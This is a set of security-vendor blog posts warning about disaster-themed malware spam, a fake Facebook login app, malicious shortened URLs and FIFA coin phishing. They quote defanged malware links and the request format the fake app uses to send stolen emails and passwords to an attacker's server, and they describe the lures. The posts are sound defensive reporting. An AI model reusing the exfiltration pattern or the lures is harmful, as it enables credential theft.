Spammers Continue to Exploit the Disaster in Japan

Symantec has blogged previously about spammers exploiting the recent catastrophic situation in Japan. Since then, Symantec has observed additional variations in spam attacks in which the spammers are continuing to exploit the tragedy, even as the earthquake and tsunami relief efforts are in progress. Similar to what we have seen in the past, virus attacks in the form of messages containing links to images in the message body were observed in the third week of March. Such attacks, along with scam emails, are usually prevalent after such disasters have occurred. The subject line and screenshot of a sample message body of the virus attack can be seen below.

Subject: Novo tsunami atinge Sendai e Japao declara estado de emergencia em usina nuclear
[Subject: New tsunami hits Japan Sendai and declares state of emergency in nuclear plant]

As seen in the screenshot above, what appears to be a video is in fact just a link to an image. Once the link is clicked, the user is asked to download and install an executable file (“XAR485849834.exe” – screenshot below) that is malware related to a Brazilian banking Trojan. The link to the image hxxp://xxx.<removed>trade.com/globo.com.html  leads the user to download the malware payload from the attacking machine. After it has been successfully installed, the malware gathers the user’s Internet banking details and other sensitive information.


 
Similar to the sample above, another variation of the spam attack has a message that lures the user into watching a video of the devastating tsunami in Japan. The From and Subject lines of the spam message are below.

From: "Veja o video gravado no momento do tsunami no japao." <[email protected]>
Subject: Veja o video gravado no momento do tsunami no japao.

The English translation of the subject line and body of the spam message (in Portuguese) is below.

Subject: Watch the video recorded at the time of the tsunami in Japan.

Camera man was able to shoot everything
View video

What appears to be a video is again just an image that is composed of a link to the attacking machine that downloads the malware. The IP addresses involved in the above spam attacks are traced back to Brazil.

The scammers have also been exploiting the relief efforts by sending  419 scam emails that have been prevalent ever since the natural disaster took place. In another variation of the Nigerian scam that has been observed recently, the fake message urges people to help the survivors of the earthquake and tsunami while the country is battling a nuclear crisis.


 
The message lists the various organizations working on relief and recovery in the region. However, towards the end the message, the scammer requests a donation in the form of a wire transfer payment through a popular service. The scammer also asks that the sender emails the complete details of the transaction (as mentioned on the receipt) to an email address that quite obviously belongs to the scammers. Scammers favor wire transfer services because payments are irreversible, untraceable, and require minimal identity checks. The IP address 82.128.7.139—which is involved in the scam email—was traced back to Lagos, Nigeria. This IP has been blacklisted because of its past involvement in such scams.

Symantec recommends that our readers reach out to the earthquake and tsunami victims through legitimate and secure channels so that the help that you send reaches the intended recipients. Moreover, be cautious of downloading certain file types, particularly executables (.exe). Any emails containing or leading to this type of application extension should be considered suspicious, particularly if it's coming from an unknown sender.

Note: My thanks to Carlos Mejia, Mayur Deshpande, and Paresh Joshi for the spam samples contributed to this blog.

Another Fake Facebook App is Here to Steal your Passwords

Recently, we came across an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook:

Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app will log the user out and ask him/her to log in again:

When the user clicks on the “Login” button, it will show the login form:


 
When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:

http://IPRemoved/log.php?email=<email address>&pass=<password>

Using best practice advice, one can check the URL information bar to determine the destination of the URL—but that isn’t enough in this case. The URL bar will show apps.facebook.com when the login form is displayed, even though the credentials will be posted to a malicious site instead.

The following are the fiddler logs that show email addresses and passwords being posted to the malicious server:


The bogus app also "likes" the link in an automatic post, which will be displayed on the user's profile:


We have also observed a similar attack hosted on the same IP address. It displays a different message: “Video: This is the best April Fools' prank ever!” This attack also employs the same technique, as mentioned above, in order to steal usernames and passwords for users’ Facebook accounts:

 

The good news is that Symantec customers are protected from this attack. We at Symantec urge the readers to install all security patches and definitions regularly.

Taking the Shortcut to Malicious Attacks

Taking the Shortcut to Malicious Attacks 

Shortened URLs have become popular in recent years as a means of conserving space in character-limited text fields, such as those used for micro-blogging. Some URLs consist of a substantial number of characters that can eat up character limits, break the flow of text, or cause distortions in how Web pages are rendered for users. URL shortening services allow people to submit a URL and receive a second, specially coded shortened URL that redirects to the original URL. When a user clicks on the shortened URL, the service will redirect the person to the submitted Web page.

Attackers are taking advantage of this type of service because it helps to hide the actual destination URL. Attackers use the shortened links, which may or may not be legitimate, to lead unwitting users to malicious websites that are designed to attack any system using a vulnerable browser. 

Social networks are a security concern for organizations because they provide an effective platform for attackers to launch this type of attack. Users who see a link posted by a friend may be more likely to trust (and click on) links posted on social networking sites, with little fear of danger. Therefore, an attacker who compromises a social networking account can prey on the inherent trust of the social network connected to that account and post URLs that link to malicious websites. During a three-month observation period in 2010, two-thirds of the malicious URLs observed on social networks were shortened URLs. Currently, most malicious URLs on social networking sites lead to websites that are hosting attack toolkits.

Using malicious shortened URLs can be a very successful method of attack. Symantec measured the number of times a malicious shortened URL was clicked on to determine the success of the link. Of the shortened URLs leading to malicious websites that Symantec observed on social networking sites over a four-month period in 2010, 88 percent were clicked on at least once.

As more people join and frequent social networking sites and the sophistication of these sites grows, it is likely that more complex attacks will be perpetrated through them, including the use of malicious shortened URLs. In addition, these threats should be a concern for network administrators because many users access their social networks from work computers. Users should ensure that they monitor the security settings of their profiles on these sites as much as possible, especially because many settings are automatically set to share a wealth of potentially exploitable information. It is up to the user to restrict access to his or her social networking profile.

For further information on these and other malicious attacks, please refer to the Symantec Internet Security Threat Report, Vol. 16.

Free Coins for Online FIFA Players

In the past couple of months, Symantec observed phishing sites that spoofed online FIFA games. The legitimate game is played by forming a team of footballers purchased with coins. The more games you win with your team, the more coins you gain. The popular and more skilled footballers demand a higher number of coins.

The phishing campaign was launched with fake offers of free coins to lure online FIFA players. One of the phishing sites was purportedly from a player who sympathized with end users who struggle with the game. The phishing site contained a message from this fictitious player which expressed the embarrassment one goes through for having a team of low profile footballers. The message explained that the site would help players generate free coins so that they could form a more expensive team of footballers. The phishing site prompted users to login with their email address and password to gain up to 10,000 free coins per day. The phishing pages featured popular footballers such as Wayne Rooney, Ronaldinho, Frank Lampard, and Xavi, giving the impression that one could buy these players upon generating the free coins. If end users fell victim to the phishing site, phishers would have successfully stolen their information for identity theft.

The following are some noteworthy statistics observed about of the phishing attack:

· 89% of the phishing sites were hosted on free Web hosting sites.

· 5% used IP domains (for example, domains that look like 255.255.255.255).

· 13% were typosquatting. (Typosquatting refers to the practice of registering domain names that are typo variations of popular Web sites.)

· The country code top level domains (ccTLDs) most utilized was of Tokelau (.tk) and United Kingdom (.uk) with 3% and 0.4% of the phishing attack, respectively.

 

Internet users are advised to follow best practices to avoid phishing attacks:

•    Do not click on suspicious links in email messages. 

•    Avoid providing any personal information when answering an email.

•    Never enter personal information in a pop-up screen.

•    Frequently update your security software, such as Norton Internet Security 2011, which protects you from online phishing.